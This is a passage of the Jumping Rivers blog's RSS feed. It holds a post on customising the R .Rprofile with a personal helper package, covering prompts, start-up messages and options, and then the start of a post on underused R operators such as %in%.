&lt;p&gt;This is just one example of how we use R as a tool for Systems Administration. Another tool we have created is called monitR, a package to monitor the full stack of services that might be offered to a specific client. This tool has the back-end functions to manage the data, building upon existing system administration tools and frameworks. It also has a Shiny dashboard that allows us to visualize all the data for our clients. In conclusion, R has many uses aside from classical statistical analysis and shouldn’t be seen as a language solely for Data Scientists.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-as-a-tool-for-systems-administration/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Customising your Rprofile</title><link>https://www.jumpingrivers.com/blog/customising-your-rprofile/</link><pubDate>Fri, 17 Jan 2020 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/customising-your-rprofile/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/customising-your-rprofile/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/customising-your-rprofile/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="what-is-an-rprofile"&gt;What is an Rprofile&lt;/h1&gt;
&lt;p&gt;Every time R starts, it runs through a couple of R scripts. One of these scripts is the &lt;code&gt;.Rprofile&lt;/code&gt;. This allows users to customise their particular set-up. However, some care has to be taken: if this script is broken, it can cause R to break. If this happens, just delete the script!&lt;/p&gt;
&lt;p&gt;Full details of how the .Rprofile works can be found in my book with Robin on &lt;a href="https://csgillespie.github.io/efficientR/set-up.html#r-startup" rel="external"&gt;Efficient R programming&lt;/a&gt;. Roughly, R will look for a file called &lt;code&gt;.Rprofile&lt;/code&gt; first in your current working directory, then in your home area. Crucially, it will only load the first file found. This means you can have a per-project Rprofile.&lt;/p&gt;
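&lt;p&gt;As a rough illustration of that lookup order, here is a minimal sketch in base R. The helper &lt;code&gt;find_rprofile()&lt;/code&gt; is hypothetical and deliberately simplified: it ignores other parts of the start-up process, such as the &lt;code&gt;R_PROFILE_USER&lt;/code&gt; environment variable.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Simplified lookup: current working directory first, then the home directory
find_rprofile = function(dirs = c(getwd(), path.expand(&amp;#34;~&amp;#34;))) {
  candidates = file.path(dirs, &amp;#34;.Rprofile&amp;#34;)
  found = candidates[file.exists(candidates)]
  if (length(found) == 0) {
    return(NULL)
  }
  # Only the first match is used, mirroring the behaviour described above
  found[[1]]
}

# Path of the .Rprofile that would win, or NULL if there is none
find_rprofile()
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;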
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2020-customising-your-rprofile"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h1 id="my-rprofile"&gt;My Rprofile&lt;/h1&gt;
&lt;p&gt;A few months ago, I noticed my Rprofile was becoming increasingly untidy, so I bundled it up into a single, opinionated package. This also made it easier for me to switch between computers. Last week, there was an interesting twitter thread on customising your &lt;code&gt;.Rprofile&lt;/code&gt; started by &lt;a href="https://twitter.com/kara_woo/" rel="external"&gt;Kara Woo&lt;/a&gt;. The thread became popular with lots of great suggestions on neat customisations. This also provided the impetus to write this post.&lt;/p&gt;
&lt;h2 id="installation"&gt;Installation&lt;/h2&gt;
&lt;p&gt;You can install the package from &lt;a href="https://github.com/csgillespie/rprofile" rel="external"&gt;GitHub&lt;/a&gt; with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# install.packages(&amp;#34;remotes&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;csgillespie/rprofile&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The package also uses two non-CRAN packages:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Used for nice prompts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;gaborcsardi/prompt&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Used for nice colours in the terminal; not for Windows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;remotes&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install_github&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;jalvesaq/colorout&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="r-prompt"&gt;R Prompt&lt;/h2&gt;
&lt;p&gt;You can make simple customisations to your R prompt using &lt;code&gt;options()&lt;/code&gt;, but for extra bling I use the {prompt} package.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you are in a Git repo, the branch will be displayed.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-prompt-300x127.jpg" style="width:400px; class:image-center"&gt;
&lt;ul&gt;
&lt;li&gt;If R’s memory becomes large, the size will also be displayed.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-prompt-big.jpg" style="width:400px; class:image-center"&gt;
&lt;p&gt;As the RStudio console already has a lot of nice features, e.g. syntax highlighting, a distinction needs to be made between the RStudio &lt;em&gt;Console&lt;/em&gt; and running R in the terminal. So in my &lt;code&gt;.Rprofile&lt;/code&gt; I’ve got some logic to detect where I’m running R and adjust accordingly.&lt;/p&gt;
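&lt;p&gt;As a minimal sketch of that kind of logic (not the code used in {rprofile}), the snippet below picks a prompt with plain &lt;code&gt;options()&lt;/code&gt;. It assumes RStudio sets the &lt;code&gt;RSTUDIO&lt;/code&gt; environment variable to &lt;code&gt;1&lt;/code&gt;; the helpers &lt;code&gt;in_rstudio()&lt;/code&gt; and &lt;code&gt;choose_prompt()&lt;/code&gt; are hypothetical.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Assumption: RStudio sets the RSTUDIO environment variable to &amp;#34;1&amp;#34;
in_rstudio = function() {
  identical(Sys.getenv(&amp;#34;RSTUDIO&amp;#34;), &amp;#34;1&amp;#34;)
}

# Keep the default prompt in RStudio, use a more visible one in a terminal
choose_prompt = function(rstudio = in_rstudio()) {
  if (rstudio) &amp;#34;&amp;gt; &amp;#34; else &amp;#34;R&amp;gt; &amp;#34;
}

options(prompt = choose_prompt())
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;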
&lt;h3 id="useful-start-up-messages"&gt;Useful Start-up Messages&lt;/h3&gt;
&lt;p&gt;If you use R a lot, you want to minimise noise. I used to have the {fortunes} package display a fortune in my profile, but this got repetitive. Then I tried grabbing stuff from twitter, but this slowed everything down when the wifi was poor.&lt;/p&gt;
&lt;p&gt;Currently three start-up messages are displayed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The wifi network you are connected to, with speed info (Linux only)&lt;/li&gt;
&lt;li&gt;The number of open R sessions (Linux only)&lt;/li&gt;
&lt;li&gt;RStudio project info&lt;/li&gt;
&lt;li&gt;I also clear all the standard R licence stuff from the screen.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-startup-message-300x118.jpg" style="width:400px; class:image-center"&gt;
&lt;p&gt;If anyone wants to expand the Linux only functions to Windows and Macs, please submit a pull request!&lt;/p&gt;
&lt;h2 id="helper-functions"&gt;Helper Functions&lt;/h2&gt;
&lt;p&gt;It&amp;rsquo;s always dangerous to load functions in your start-up script, so I&amp;rsquo;ve only included functions I’m fairly sure won’t be used in a script.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;create_make_functions()&lt;/code&gt; - if you have a &lt;code&gt;Makefile&lt;/code&gt; in your working directory, this will automatically generate all associated make functions. For example, if you have a &lt;code&gt;force&lt;/code&gt; target in the &lt;code&gt;Makefile&lt;/code&gt; this will generate &lt;code&gt;make_force()&lt;/code&gt;. This is actually run at startup.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;lsos()&lt;/code&gt; - a handy function for listing large objects.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;library()&lt;/code&gt; - Overwrites the &lt;code&gt;library()&lt;/code&gt; function with a smarter version. If a package is missing, it automatically provides the option to install from CRAN or GitHub.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;last_error()&lt;/code&gt; and &lt;code&gt;last_trace()&lt;/code&gt; - pre-loads from {rlang}. Nicer error investigation.&lt;/li&gt;
&lt;/ul&gt;
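&lt;p&gt;To give a flavour of what a helper for listing large objects might look like, here is a minimal base R sketch. It is not the &lt;code&gt;lsos()&lt;/code&gt; function from the package; &lt;code&gt;list_large_objects()&lt;/code&gt; is a hypothetical name.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Return the sizes (in bytes) of the `n` largest objects in `env`
list_large_objects = function(env = globalenv(), n = 5) {
  nms = ls(envir = env)
  sizes = vapply(
    nms,
    function(nm) as.numeric(utils::object.size(get(nm, envir = env))),
    numeric(1)
  )
  utils::head(sort(sizes, decreasing = TRUE), n)
}

# Example with a throwaway environment
demo_env = new.env()
assign(&amp;#34;big&amp;#34;, numeric(1e5), envir = demo_env)
assign(&amp;#34;small&amp;#34;, 1, envir = demo_env)
list_large_objects(demo_env)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;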
&lt;h2 id="rstudio-functions"&gt;RStudio Functions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;op(path = &amp;quot;.&amp;quot;)&lt;/code&gt; - Creates &amp;amp; opens an RStudio project in the directory specified.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;cp()&lt;/code&gt; - Lists previous RStudio projects and gives an option to open.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;inf_mr()&lt;/code&gt; - Shortcut to &lt;code&gt;xaringan::inf_mr()&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;img class="image-center" src="2020-01-17-rprofile-cp-300x101.png" style="width:400px; class:image-center"&gt;
&lt;h3 id="setting-better-options"&gt;Setting Better &lt;code&gt;options()&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;set_startup_options()&lt;/code&gt; function sets a better (in my opinion) set of start-up options. These include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Setting &lt;code&gt;Ncpus&lt;/code&gt; to run parallel installs by default&lt;/li&gt;
&lt;li&gt;Removing significant stars&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;mc.cores&lt;/code&gt; to a sensible default&lt;/li&gt;
&lt;li&gt;Change the &lt;code&gt;continue = &amp;quot;+&amp;quot;&lt;/code&gt; to a blank space&lt;/li&gt;
&lt;li&gt;Reduce the default print length&lt;/li&gt;
&lt;li&gt;Plus a few others (see &lt;code&gt;?set_startup_options&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
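&lt;p&gt;For readers who prefer not to install the package, options like these can be set directly with &lt;code&gt;options()&lt;/code&gt;. The sketch below uses standard R option names, but the values are illustrative assumptions rather than the defaults chosen by &lt;code&gt;set_startup_options()&lt;/code&gt;; in particular, using &lt;code&gt;max.print&lt;/code&gt; for the print length is a guess.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Leave one core free; fall back to 1 if the core count cannot be detected
n_cores = max(1L, parallel::detectCores() - 1L, na.rm = TRUE)

options(
  Ncpus = n_cores,            # parallel package installs
  show.signif.stars = FALSE,  # no significance stars in model summaries
  mc.cores = n_cores,         # default for parallel::mclapply() (forking is unavailable on Windows)
  continue = &amp;#34; &amp;#34;,             # blank continuation prompt instead of &amp;#34;+&amp;#34;
  max.print = 100L            # shorter printed output
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;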
&lt;p&gt;I&amp;rsquo;ve also created a convenience function for adding additional R repositories - &lt;code&gt;set_repos()&lt;/code&gt;. Probably not needed by most people.&lt;/p&gt;
&lt;h2 id="example-rprofile"&gt;Example &lt;code&gt;.Rprofile&lt;/code&gt;&lt;/h2&gt;
&lt;p&gt;Open your &lt;code&gt;.Rprofile&lt;/code&gt;, e.g. &lt;code&gt;file.edit(&amp;quot;~/.Rprofile&amp;quot;)&lt;/code&gt; and customise however you want. Here’s an example&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;interactive&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;requireNamespace&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rprofile&amp;#34;&lt;/span&gt;, quietly &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Only useful if you use Makefiles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_make_functions&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Startup options&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_startup_options&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Not RStudio console&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is_terminal&lt;/span&gt;()) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_terminal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_rstudio&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .env &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_functions&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;attach&lt;/span&gt;(.env)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Display wifi and no of R sessions&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Linux only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_startup_info&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Prints RStudio project on start-up&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;setHook&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rstudio.sessionInit&amp;#34;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(newSession) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; active_rproj &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rprofile&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_active_rproj&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.null&lt;/span&gt;(active_rproj)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;message&lt;/span&gt;(glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{crayon::yellow(&amp;#39;R-project:&amp;#39;)} {active_rproj}&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}, action &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;append&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="notes-and-thanks"&gt;Notes and thanks&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;lsos()&lt;/code&gt; function was taken from this &lt;a href="https://stackoverflow.com/q/1358003/203420" rel="external"&gt;SO&lt;/a&gt; question.&lt;/li&gt;
&lt;li&gt;The improved version of &lt;code&gt;library()&lt;/code&gt; was adapted from the &lt;a href="https://github.com/jimhester/autoinst/" rel="external"&gt;autoinst&lt;/a&gt; package. I did think about importing the package, but I had made too many personal tweaks.&lt;/li&gt;
&lt;li&gt;Setting the prompt uses the excellent &lt;a href="https://github.com/gaborcsardi/prompt" rel="external"&gt;prompt&lt;/a&gt; package.&lt;/li&gt;
&lt;li&gt;I&amp;rsquo;ve probably &amp;ldquo;borrowed&amp;rdquo; some of the other ideas from blogposts and SO questions. If I&amp;rsquo;ve missed crediting you, please let me know and I&amp;rsquo;ll rectify it.&lt;/li&gt;
&lt;li&gt;If you have any suggestions or find bugs, please use the GitHub &lt;a href="https://github.com/csgillespie/rprofile/issues" rel="external"&gt;issue tracker&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Feel free to submit pull requests&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/customising-your-rprofile/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Key R Operators</title><link>https://www.jumpingrivers.com/blog/r-overview-operators/</link><pubDate>Wed, 11 Dec 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-overview-operators/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-overview-operators/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-overview-operators/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="operators-you-should-make-more-use-of-in-r"&gt;Operators you should make more use of in R&lt;/h1&gt;
&lt;p&gt;Only recently have I discovered the true power of some of the operators in R. Here are some tips on some underused operators in R:&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-overview-operators"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-in-operator"&gt;The %in% operator&lt;/h3&gt;
&lt;p&gt;This funny looking operator is very handy. It’s short for testing if several values appear in an object. For instance&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To grab all the values where x is 2, 4 or 14 we could do&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2 4 4 14 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;or we could use &lt;code&gt;%in%&lt;/code&gt; …&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;x[x &lt;span style="color:#ff7b72;font-weight:bold"&gt;%in%&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2 4 4 14 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This is something I use all the time for filtering data. Imagine you’ve got a tibble of data relating to the world (step up {spData})&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sf&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sp&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(world, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# drop the geometry column because we don&amp;#39;t need it&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;world &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; world &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_drop_geometry&lt;/span&gt;()
